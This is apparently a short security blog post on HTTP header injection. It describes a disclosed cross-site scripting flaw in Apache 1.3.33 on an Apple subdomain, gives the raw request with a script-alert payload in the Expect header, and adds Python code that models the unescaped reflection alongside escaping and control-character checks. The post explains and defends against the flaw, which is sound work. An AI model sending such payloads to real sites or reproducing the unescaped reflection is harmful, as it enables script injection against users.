HTTP Header
HTTP headers are a component of HTTP requests and responses. Header fields are transmitted with each request and response and carry additional data about them. See typical request and response headers at Web-Sniffer.net.
HTTP header injection
HTTP header injection is a kind of web application vulnerability that exists in web applications that generate HTTP headers based on input given by users. If an application uses user-supplied input in its headers, that input can be used for HTTP response splitting, cross-site scripting (XSS), session fixation via the Set-Cookie header, and malicious redirects via the Location header. I recently found a similar kind of vulnerability in http://canadaedu.apple.com and for this I was also acknowledged by Apple on its website.
It used Apache 1.3.33, which was vulnerable to HTML and malicious JavaScript injection through the "Expect" header.
See the request headers sent to the website:
GET / HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: canadaedu.apple.com
Cookie: PHPSESSID=3b8026225d719c6945155129c5c7335d
Connection: Close
Expect: <script>alert(411731119275)</script>
Pragma: no-cache
The alert box added in the Expect field shows how script could be injected for cross-site scripting.
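The two defences that follow from the above, as an added example that is not code from the original post or from Apache: HTML-escaping a request header before echoing it into an error page, and refusing control characters in any user-supplied value written into a response header such as Location. The function names, the simplified error page and the /courses path are assumptions made for illustration.

```python
import html
import re

# Request from the post, reproduced here as constructed sample input.
SAMPLE_REQUEST = (
    "GET / HTTP/1.0\r\n"
    "Host: canadaedu.apple.com\r\n"
    "Expect: <script>alert(411731119275)</script>\r\n"
    "Connection: Close\r\n\r\n"
)

# CR, LF, NUL and other control characters (horizontal tab is allowed).
CONTROL_CHARS = re.compile(r"[\x00-\x08\x0a-\x1f\x7f]")

def parse_headers(raw: str) -> dict:
    """Return request headers as a dict keyed by lower-cased field name."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers

def error_page(expect: str, escape: bool = True) -> str:
    """Simplified model of an error body that echoes the Expect value.
    escape=False reproduces the unescaped reflection described in the post."""
    shown = html.escape(expect, quote=True) if escape else expect
    return f"<html><body><h1>417 Expectation Failed</h1><p>Expect: {shown}</p></body></html>"

def header_line(name: str, value: str) -> str:
    """Build one response header line, refusing values that could start a new line."""
    if CONTROL_CHARS.search(value):
        raise ValueError(f"control character in {name} value")
    return f"{name}: {value}\r\n"

def redirect(target: str) -> str:
    """302 response whose Location value comes from user input."""
    return "HTTP/1.1 302 Found\r\n" + header_line("Location", target) + "\r\n"

if __name__ == "__main__":
    expect = parse_headers(SAMPLE_REQUEST)["expect"]
    print(error_page(expect, escape=False))  # script tag reaches the browser intact
    print(error_page(expect))                # same value rendered as inert text
    print(redirect("/courses"))
```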